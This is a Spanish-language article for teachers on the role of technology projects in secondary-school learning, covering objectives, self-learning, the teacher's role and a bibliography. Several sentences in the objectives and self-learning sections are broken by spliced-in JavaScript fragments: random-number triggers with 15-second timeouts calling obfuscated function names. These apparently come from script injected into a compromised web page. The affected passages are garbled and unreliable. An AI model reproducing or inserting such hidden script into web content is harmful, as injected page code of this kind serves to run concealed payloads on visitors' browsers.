RELACIÓN DE LOS PROYECTOS TECNOLÓGICOS CON EL APRENDIZAJE DEL ALUMNO.

Autora: Rocío Caballero Morenas.

La asignatura de Tecnologías, como todas las demás, está enfocada al desarrollo del aprendizaje del alumno; pero cuenta con una parte fundamental: el desarrollo de proyectos, que ayudan a entender y fijar los conceptos adquiridos durante la parte teórica.

IMPORTANCIA DE LOS PROYECTOS EN TECNOLOGÍA

En el desarrollo de la asignatura de Tecnologías a lo largo del curso, otorgamos mucha importancia al desarrollo de proyectos por dos razones:

  1. Los proyectos sirven para aplicar los conocimientos adquiridos en la parte teórica, aclarandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando los conceptos y ayudandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando al aprendizaje de realización de los mismos.
  2. Para alcanzar algunos objetivos de área de Tecnologías es indispensable la realización de proyectos. Algunos de los que reflejan esta tarea son:

1) Diseñar, planificar y construir objetos o sistemas que resuelvan el problema estudiado.

2) Manipular de forma segura y precisa los materiales, objetos y sistemas tecnológicos.

4) Expresar y comunicar ideas y soluciones técnicas, así como explorar su viabilidad y alcance utilizandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando los medios tecnológicos, recursos gráficos, la simbología y el vocabulario adecuados.

8)  Actuar de forma dialogante, flexible y responsable en el trabajo en equipo, en la búsqueda de soluciones, en la toma de decisiones y en la ejecución de las tareas encomendadas con actitud de respeto, cooperación, tolerancia y solidaridad.

AUTOAPRENDIZAJE

En muchas ocasiones debemos dejar que sean los alumnos quienes alcancen por ellos mismos un aprendizaje. En la asignatura de Tecnologías podemos lograrlo por dos métodos:

  1. Investigación: al plantear un problema y hacer que ellos busquen la solución estamos invitándolos a que recopilen información acerca del problema y sus posibles soluciones. En este momento entra en juego su manejo en los distintos canales de información y comunicación para obtener lo deseado. Además con ello estamos fomentandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando el uso de las nuevas Tecnologías.
  2. Experimentación: normalmente se encuadra en la fase de construcción del proyecto, que se realiza en el aula taller, donde el alumno, sirviéndose de materiales y herramientas, tiene la posibilidad de hacer pruebas y obtener resultados por sí mismo. En ocasiones surgen inconvenientes o contratiempos que no estaban reflejados en la planificación del proyecto y que obligan, con más motivo, a realizar “experimentos” para solucionarlos.

EL PROFESOR Y EL  PROYECTO TECNOLÓGICO

Para lograr todos los objetivos que se pretenden con un proyecto tecnológico, necesitamos una previa preparación y planificación del proyecto por parte del profesor/a. Algunos de los puntos que deben tenerse en cuenta son:

-       Implicación de los profesores: el profesor no debe ser un mero observador durante el proceso de desarrollo del proyecto, sino que debe implicarse en él. En primer lugar, siendo consciente de las partes del proyecto que pueden crear más dificultad y conociendo soluciones para posibles problemas que puedan surgir durante el desarrollo.

-       Motivación de los alumnos: es una tarea muy importante. Hay que ayudarles a ver que son capaces de seguir adelante por sí mismos con el proyecto aunque se presente algún contratiempo.

-       Elección de los contenidos: además de cumplir con los contenidos que está reflejados en la programación, los proyectos deben tocar temas que sean del interés de los alumnos, ya que así conseguiremos mayor motivación e implicación por su parte.

-       Grado de dificultad del proyecto: el proyecto planteado no debe ser muy fácil, ya que entonces no le darán importancia ni se implicará por considerarlo demasiado obvio; ni muy difícil, porque entonces lo verán imposible de alcanzar y tampoco se implicarán, ya que consideran que no verán el resultado de su trabajo.

BIBLIOGRAFÍA

-      LOPEZ CUBINO, R: El área de tecnología en secundaria. Narcea 2001.

-      DECRETO 83/2007, de 24 de abril. Currículo de Educación Secundaria Obligatoria para la Comunidad Autónoma de Extremadura.

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